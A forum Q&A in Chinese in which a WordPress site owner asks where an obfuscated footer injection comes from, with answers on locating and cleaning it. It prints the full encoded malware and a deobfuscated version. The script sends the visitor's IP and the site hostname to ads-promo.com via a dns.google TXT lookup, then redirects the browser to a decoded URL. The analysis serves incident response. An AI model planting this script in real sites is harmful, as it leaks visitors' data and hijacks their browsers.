WordPress页脚中的Javascript注入重定向黑客代码,它来自哪里?


我正在拼命寻找注入到我的 WordPress 网站页脚中的这组代码。扫描仪插件找不到它。我的托管提供商运行了扫描,但也找不到它。我在Visual Studio Code中手动搜索网站文件中的代码,什么也没有。

下面是完整的恶意代码。这些数字是字符编码,解码后得到的脚本会指向恶意的外部域名。受影响的网站是 vulair.com

非常感谢你们提前提供的帮助!

    <!--
      Malware sample as pasted by the site owner; the code below is unchanged.
      String.fromCharCode(...) spells out a second inline <script> as decimal character codes
      (60, 115, 99, 114, 105, 112, 116, 62 is "<script>") and document.write() injects it into the page.
      The inner script keeps its strings as \xNN hex escapes in an array named _$_a798, so neither the
      contacted domain names nor words such as "fetch" occur literally in this text, and a plain-text
      search for them will not match. Search for the wrapper instead, for example
      "document.write(String.fromCharCode(".
      NOTE(review): the long argument list appears to be a single statement that the page wrapped over
      several lines.
    -->
    <script>
      document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 118, 97, 114, 32, 95, 36, 95, 97, 55, 57, 56, 61, 91, 34, 92, 120, 50, 69, 34, 44, 34, 92, 120, 50, 68, 34, 44, 34, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 55, 48, 92, 120, 54, 67, 92, 120, 54, 49, 92, 120, 54, 51, 92, 120, 54, 53, 92, 120, 52, 49, 92, 120, 54, 67, 92, 120, 54, 67, 34, 44, 34, 92, 120, 54, 57, 92, 120, 55, 48, 34, 44, 34, 92, 120, 51, 65, 34, 44, 34, 92, 120, 54, 56, 92, 120, 54, 70, 92, 120, 55, 51, 92, 120, 55, 52, 92, 120, 54, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 44, 34, 92, 120, 54, 67, 92, 120, 54, 70, 92, 120, 54, 51, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 57, 92, 120, 54, 70, 92, 120, 54, 69, 34, 44, 34, 34, 44, 34, 92, 120, 55, 53, 92, 120, 54, 69, 92, 120, 54, 66, 92, 120, 50, 69, 92, 120, 54, 51, 92, 120, 54, 70, 92, 120, 54, 68, 34, 44, 34, 92, 120, 52, 49, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 55, 55, 92, 120, 54, 53, 92, 120, 55, 50, 34, 44, 34, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 34, 44, 34, 92, 120, 54, 52, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 49, 34, 44, 34, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 52, 53, 92, 120, 54, 49, 92, 120, 54, 51, 92, 120, 54, 56, 34, 44, 34, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 54, 55, 92, 120, 55, 52, 92, 120, 54, 56, 34, 44, 34, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 55, 48, 92, 120, 54, 67, 92, 120, 54, 49, 92, 120, 54, 51, 92, 120, 54, 53, 34, 44, 34, 92, 120, 55, 52, 92, 120, 54, 56, 92, 120, 54, 53, 92, 120, 54, 69, 34, 44, 34, 92, 120, 54, 65, 92, 120, 55, 51, 92, 120, 54, 70, 92, 120, 54, 69, 34, 44, 34, 92, 120, 54, 56, 92, 120, 55, 52, 92, 120, 55, 52, 92, 120, 55, 48, 92, 120, 55, 51, 92, 120, 51, 65, 92, 120, 50, 70, 92, 120, 50, 70, 92, 120, 54, 52, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 50, 69, 92, 120, 54, 55, 92, 120, 54, 70, 92, 120, 54, 70, 92, 120, 54, 55, 92, 120, 54, 67, 92, 120, 
54, 53, 92, 120, 50, 70, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 55, 51, 92, 120, 54, 70, 92, 120, 54, 67, 92, 120, 55, 54, 92, 120, 54, 53, 92, 120, 51, 70, 92, 120, 54, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 51, 68, 34, 44, 34, 92, 120, 55, 50, 92, 120, 54, 49, 92, 120, 54, 69, 92, 120, 54, 52, 92, 120, 54, 70, 92, 120, 54, 68, 34, 44, 34, 92, 120, 54, 54, 92, 120, 54, 67, 92, 120, 54, 70, 92, 120, 54, 70, 92, 120, 55, 50, 34, 44, 34, 92, 120, 50, 69, 92, 120, 54, 49, 92, 120, 54, 52, 92, 120, 55, 51, 92, 120, 50, 68, 92, 120, 55, 48, 92, 120, 55, 50, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 54, 70, 92, 120, 50, 69, 92, 120, 54, 51, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 50, 54, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 92, 120, 51, 68, 92, 120, 55, 52, 92, 120, 55, 56, 92, 120, 55, 52, 34, 44, 34, 92, 120, 54, 56, 92, 120, 55, 52, 92, 120, 55, 52, 92, 120, 55, 48, 92, 120, 55, 51, 92, 120, 51, 65, 92, 120, 50, 70, 92, 120, 50, 70, 92, 120, 54, 49, 92, 120, 55, 48, 92, 120, 54, 57, 92, 120, 51, 54, 92, 120, 51, 52, 92, 120, 50, 69, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 54, 57, 92, 120, 54, 54, 92, 120, 55, 57, 92, 120, 50, 69, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 55, 92, 120, 51, 70, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 68, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 51, 68, 92, 120, 54, 65, 92, 120, 55, 51, 92, 120, 54, 70, 92, 120, 54, 69, 34, 93, 59, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 95, 48, 120, 49, 67, 55, 68, 52, 41, 123, 102, 101, 116, 99, 104, 40, 95, 36, 95, 97, 55, 57, 56, 91, 50, 49, 93, 41, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 53, 93, 93, 40, 40, 95, 48, 120, 49, 67, 56, 49, 68, 41, 61, 62, 95, 48, 120, 49, 67, 56, 49, 68, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 54, 93, 93, 40, 41, 41, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 53, 93, 93, 40, 40, 95, 48, 120, 49, 67, 56, 65, 70, 41, 61, 62, 123, 95, 48, 120, 49, 67, 56, 65, 70, 61, 32, 
95, 48, 120, 49, 67, 56, 65, 70, 91, 95, 36, 95, 97, 55, 57, 56, 91, 51, 93, 93, 91, 95, 36, 95, 97, 55, 57, 56, 91, 50, 93, 93, 40, 95, 36, 95, 97, 55, 57, 56, 91, 48, 93, 44, 95, 36, 95, 97, 55, 57, 56, 91, 49, 93, 41, 59, 95, 48, 120, 49, 67, 56, 65, 70, 61, 32, 95, 48, 120, 49, 67, 56, 65, 70, 91, 95, 36, 95, 97, 55, 57, 56, 91, 50, 93, 93, 40, 95, 36, 95, 97, 55, 57, 56, 91, 52, 93, 44, 95, 36, 95, 97, 55, 57, 56, 91, 49, 93, 41, 59, 108, 101, 116, 32, 95, 48, 120, 49, 67, 56, 54, 54, 61, 119, 105, 110, 100, 111, 119, 91, 95, 36, 95, 97, 55, 57, 56, 91, 54, 93, 93, 91, 95, 36, 95, 97, 55, 57, 56, 91, 53, 93, 93, 59, 105, 102, 40, 95, 48, 120, 49, 67, 56, 54, 54, 61, 61, 32, 95, 36, 95, 97, 55, 57, 56, 91, 55, 93, 41, 123, 95, 48, 120, 49, 67, 56, 54, 54, 61, 32, 95, 36, 95, 97, 55, 57, 56, 91, 56, 93, 125, 59, 102, 101, 116, 99, 104, 40, 95, 36, 95, 97, 55, 57, 56, 91, 49, 55, 93, 43, 32, 95, 48, 120, 49, 67, 56, 54, 54, 43, 32, 95, 36, 95, 97, 55, 57, 56, 91, 48, 93, 43, 32, 95, 48, 120, 49, 67, 56, 65, 70, 43, 32, 95, 36, 95, 97, 55, 57, 56, 91, 48, 93, 43, 32, 77, 97, 116, 104, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 57, 93, 93, 40, 77, 97, 116, 104, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 56, 93, 93, 40, 41, 42, 32, 49, 48, 50, 52, 42, 32, 49, 48, 50, 52, 42, 32, 49, 48, 41, 43, 32, 95, 36, 95, 97, 55, 57, 56, 91, 50, 48, 93, 41, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 53, 93, 93, 40, 40, 95, 48, 120, 49, 67, 56, 49, 68, 41, 61, 62, 95, 48, 120, 49, 67, 56, 49, 68, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 54, 93, 93, 40, 41, 41, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 53, 93, 93, 40, 40, 95, 48, 120, 49, 67, 56, 70, 56, 41, 61, 62, 123, 105, 102, 40, 95, 48, 120, 49, 67, 56, 70, 56, 91, 95, 36, 95, 97, 55, 57, 56, 91, 57, 93, 93, 61, 61, 32, 110, 117, 108, 108, 41, 123, 114, 101, 116, 117, 114, 110, 125, 59, 118, 97, 114, 32, 95, 48, 120, 49, 67, 57, 52, 49, 61, 95, 36, 95, 97, 55, 57, 56, 91, 55, 93, 59, 95, 48, 120, 49, 67, 56, 70, 56, 91, 95, 36, 95, 97, 
55, 57, 56, 91, 57, 93, 93, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 50, 93, 93, 40, 40, 95, 48, 120, 49, 67, 57, 56, 65, 41, 61, 62, 123, 105, 102, 40, 95, 48, 120, 49, 67, 57, 56, 65, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 48, 93, 93, 61, 61, 32, 49, 54, 41, 123, 95, 48, 120, 49, 67, 57, 52, 49, 43, 61, 32, 95, 48, 120, 49, 67, 57, 56, 65, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 49, 93, 93, 125, 125, 41, 59, 95, 48, 120, 49, 67, 57, 52, 49, 61, 32, 97, 116, 111, 98, 40, 95, 48, 120, 49, 67, 57, 52, 49, 41, 59, 105, 102, 40, 33, 95, 48, 120, 49, 67, 57, 52, 49, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 51, 93, 93, 41, 123, 114, 101, 116, 117, 114, 110, 125, 59, 119, 105, 110, 100, 111, 119, 91, 95, 36, 95, 97, 55, 57, 56, 91, 54, 93, 93, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 52, 93, 93, 40, 95, 48, 120, 49, 67, 57, 52, 49, 41, 125, 41, 125, 41, 125, 41, 40, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62));
    </script>
    <link rel='stylesheet' id='so-css-astra-css' href='http://vulair.com/wp-content/uploads/so-css/so-css-astra.css?ver=1696128972' media='all' />
javascript wordpress footer code-injection
1个回答

很难精确定位这种混淆的注入,但您可以尝试定位大致的注入范围:

  1. 停用所有插件,检查代码是否仍被注入。如果注入消失,再把插件逐个重新启用,看是哪一个让注入重新出现。
  2. 对主题重复相同的步骤:暂时切换到 WordPress 默认主题。
  3. 如果您正在使用缓存,请尝试禁用它(而不是删除它,这样稍后还可以调查缓存内容),看看这是否有助于找到注入点。

如果上述步骤没有帮助,您还可以尝试转储所有 hooks(将下面这行添加到主题的 functions.php 中):

// Temporary diagnostic: prints the contents of $GLOBALS['wp_filter'] so that an unfamiliar
// callback can be spotted in the dump.
// NOTE(review): print_r writes straight into the response, so the dump may be visible to
// visitors as well; remove this line as soon as the check is done.
print_r($GLOBALS['wp_filter']);

并仔细检查计划任务(crons):

// Temporary diagnostic: read the stored 'cron' option and dump it, to look for scheduled
// entries you do not recognise.
// NOTE(review): var_dump writes into the response; remove these lines after checking.
$cron_jobs = get_option( 'cron' );
var_dump($cron_jobs);

这可以帮助您确定注入是否是从 WordPress 内部调用的。由于在网站文件中搜索不到这段代码,它也可能保存在数据库中(例如小部件、主题选项或文章内容),因此也值得在数据库导出文件中搜索 String.fromCharCode。

在服务器端,您可以尝试搜索所有 Web 服务器配置文件(例如 Apache 的 .htaccess 或 Nginx 的 nginx.conf),然后调查其中引用的路径和代码。

我尝试对代码进行反混淆,这就是我得到的:

// Readable decode of the injected footer script. Identifiers are left exactly as
// the deobfuscator produced them so they can be matched against the encoded sample.
// What the code does: it looks up the visitor's public IP, requests a TXT record
// under ads-promo.com through dns.google, base64-decodes the answer and navigates
// the browser to the result.
// Notes for whoever is cleaning up the site:
//   - In the browser's network panel this shows up as requests to api64.ipify.org
//     and to dns.google/resolve with a name ending in .ads-promo.com.
//   - The redirect destination is not present anywhere in this code; it arrives in
//     the TXT answer at run time, so it cannot be found by searching the site.
//   - fetch() is governed by the Content-Security-Policy connect-src directive; an
//     enforced policy that does not allow these two hosts blocks both requests.
// The parameter _0x1C7D4 is never used and the function is invoked without arguments.
(function (_0x1C7D4) {
    // Step 1: ask ipify for the visitor's public address (JSON body, `ip` field).
    fetch('https://api64.ipify.org?format=json').then(_0x1C81D => _0x1C81D.json()).then(_0x1C8AF => {
        // Replace '.' and ':' with '-' so the address can be used as a single DNS label.
        _0x1C8AF = _0x1C8AF.ip.replaceAll('.', '-');
        _0x1C8AF = _0x1C8AF.replaceAll(':', '-');
        // Hostname of the page the script runs on; 'unk.com' is substituted when it is empty.
        let _0x1C866 = window.location.hostname;
        if (_0x1C866 == '') {
            _0x1C866 = 'unk.com';
        };
        // Step 2: TXT lookup for <hostname>.<ip>.<random 0..10485759>.ads-promo.com.
        // The queried name itself carries the site hostname and the visitor's IP.
        // NOTE(review): the random label presumably keeps the answer from being served
        // from a cache; that cannot be confirmed from this code alone.
        fetch('https://dns.google/resolve?name=' + _0x1C866 + '.' + _0x1C8AF + '.' + Math.floor(Math.random() * 1024 * 1024 * 10) + '.ads-promo.com&type=txt').then(_0x1C81D => _0x1C81D.json()).then(_0x1C8F8 => {
            // No Answer field in the response: stop here, the page is left alone.
            if (_0x1C8F8.Answer == null) {
                return;
            };
            // Concatenate the data of every answer record whose type is 16 (TXT).
            var _0x1C941 = '';
            _0x1C8F8.Answer.forEach(_0x1C98A => {
                if (_0x1C98A.type == 16) {
                    _0x1C941 += _0x1C98A.data;
                }
            });
            // The collected text is treated as base64; an empty decode means no redirect.
            _0x1C941 = atob(_0x1C941);
            if (!_0x1C941.length) {
                return;
            };
            // Step 3: navigate to the decoded value, replacing the current history entry.
            window.location.replace(_0x1C941);
        });
    });
})();